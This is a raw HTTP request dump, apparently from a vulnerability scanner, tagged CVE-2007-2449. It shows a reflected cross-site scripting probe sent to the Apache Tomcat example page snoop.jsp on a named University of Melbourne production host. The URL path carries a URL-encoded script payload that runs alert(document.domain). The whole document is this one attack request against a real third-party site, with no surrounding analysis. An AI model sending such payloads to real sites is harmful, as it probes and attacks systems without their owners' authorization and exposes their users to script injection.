[CVE-2007-2449] Dumped HTTP request for https://science-web-prod-bachelor2-all-sites-lb.science.unimelb.edu.au/examples/jsp/snp/snoop.jsp;<script>alert(document.domain)</script>test.jsp


GET /examples/jsp/snp/snoop.jsp;%3Cscript%3Ealert%28document.domain%29%3C/script%3Etest.jsp HTTP/1.1
Host: science-web-prod-bachelor2-all-sites-lb.science.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


